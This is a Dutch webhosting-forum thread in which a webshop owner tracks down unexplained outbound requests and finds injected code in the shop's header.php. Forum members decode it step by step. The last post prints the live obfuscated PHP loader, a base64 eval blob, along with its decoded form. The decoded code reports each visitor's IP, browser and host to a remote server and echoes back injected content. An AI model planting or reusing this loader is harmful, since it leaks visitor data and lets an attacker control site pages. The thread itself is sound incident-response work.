er gebeurt eerst een dns request op 78.46.89.18 en dan een http request op 91.204.48.45, kijk eens of je die kunt verklaren
die laatste zijn database acties
Likes: 0
er gebeurt eerst een dns request op 78.46.89.18 en dan een http request op 91.204.48.45, kijk eens of je die kunt verklaren
die laatste zijn database acties
Nee dat kan ik niet verklaren, dat is een ip adres in de Ukraine.
Waar komt dit vandaan? Komt dit uit de index.php? Of een van de files in de webshop? Ik ga eens zoeken.
Misschien doe ik iets fout maar ik heb het als volgt geprobeerd:
Maar dan krijg ik gelijk de volgende prompt. Lijkt me stug dat ie zo snel alles doorzocht heeft.grep -H 91.204.48.45 /home/user/domein/domeinnaam.be/public_html/* -R | cut -d: -f1
Kan het niet iets met een licentie of een add-on zijn ofzoiets?
Hij maakt inderdaad connectie met 91.204.48.45, maar gaat blijkbaar timeouten. Daarom die vertraging.
Misschien even de volledige strace pasten? Want IP zal je niet vinden in file, aangezien hij eerst DNS request doet (dus domeinnaam ergens resolved)
@Ahmed: Uit Rusland? Nopes, geen connecties met dat land in welke vorm dan ook, behalve ip blocks in de firewall.
@Dupondje: Ik wil best een volledige strace pasten, maar weet niet hoe ik dat klaar ga krijgen.
Had al geprobeerd van "'strace php index.php > test.txt" maar in dat test.txt bestand krijg ik dan niet al die codes te zien die ik op het scherm te zien krijgt, dus klaarblijkelijk neemt ie dat niet mee op die manier.
Als ik het uberhaupt in een posting gezet krijg want het is behoorlijk veel informatie.

Dennis de Houx - All In One ~ Official ISPsystem partner
Lees hier de webhostingtalk.nl forum regels en voorwaarden!
Valt me wel op dat ik in het begin een aantal missende mysql dingen zie.
Maar oke, hier is het tekstbestand met de trace.
Hopelijk is het ergens te vinden.
Geef je hier niet zelf antwoord op je probleem? Zoals ik het lees, probeert je script te connecten met een russisch IP, welke jij in je firewall hebt staan.....@Ahmed: Uit Rusland? Nopes, geen connecties met dat land in welke vorm dan ook, behalve ip blocks in de firewall.
Ik denk dat je dan verkeerd leest. Ik schrijf geen connecties te hebben met Rusland behalve ip blocks in de firewall.
Er staat niet dat dit specifieke ip geblokkeerd is, dat is dan ook niet het geval.
Dus vermoedelijk is het script gehacked, zover was ik inderdaad ook al, maar waar zit het, waar komt het vandaan.
De coder denkt dat het probleem aan de server ligt en ik ben van mening dat het aan het script ligt, zeker nadat dit Russisch ip tevoorschijn is gekomen.
Maar als ik er iets specifieker de vinger op kan leggen sta ik sterker en is misschien ook uit te vissen op welke wijze ze het gedaan hebben.
Fixed, header.php zat nog iets in. Het bedrijf wat voor de shop zorgt heeft op mijn aanraden alle bestanden nagekeken en het stukje gevonden en gefixed.
fijn dat het gefixt is!
en dan nu de hamvraag: wat zat er nog in?
Ik heb heel vluchtig in een backup van een header.php gekeken. Daar stond een stukje base64 codering in, volgens mij was het dat want bij de vorige hack was de cookie_usage.php ook al voorzien van zo'n stukje base64.
Dat heb ik toen eens proberen te decoderen middels een link die ik op WHT vond maar kreeg alleen maar rare tekens te zien, geen php dus tja... Wat het nu precies is weet ik niet maar als je interesse hebt wil ik die header.php wel even apart zetten en hem je toesturen.
Offeh.. zo groot is dat stukje niet... hiero:
<?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKC RhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUg Lj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZX ZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRz Ij03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVE giW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJt YVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTS IgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtl dmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkID spbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIs bHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU1 8kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1i JiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLi JocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNj JC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaW ZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0s NzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSU tPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQg LCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw =="));?>QUERY select value from sessions where sesskey = '41e77c2418be8beaf3cb212fdf31bef9' and expiry > '1290473377'
En dat geeft:
Code:function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"relbmaR" ,"xednaY" ,"revihcra_ai" ,"toBNSM" ,"prulS" ,"elgooG"(yarra = 73u$'));eval(s37('}};lru$ ohce;]1[lru$ = lru$ ;)lru$,"!og!"(edolpxe = lru${))"!og!",lru$(rtsrts( fi;))]"TSOH_PTTH"[REVRES_$(edocnelru."=h&".)3au$(edocnelru."=b&".]"RDDA_ETOMER"[REVRES_$."=i"."?p"."hp.".73c$."/73c$.".73c$.73c$.73c$.73c$.73c$."//".":".73h$(stnetnoc_teg_elif@ = lru$ ;)00801+)(emit,)"stats"(5dm,73z$(eikooctes@ { esle }{ )))]73z$[EIKOOC_$(tessi( ro ))3au$ ,"i/" . )73u$ ,"|"(edolpmi . "/"(hctam_gerp((fi'));
En dat wordt dan:
Code:$z37="stats"; $h37="http"; $c37="in"; $ua3=$_SERVER["HTTP_USER_AGENT"]; $u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37]))) { } else { @setcookie($z37,md5("stats"),time()+10800); $url = @file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".$c37/".$c37.".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"])); if (strstr($url,"!go!")) { $url = explode("!go!",$url); $url = $url[1]; echo $url; } }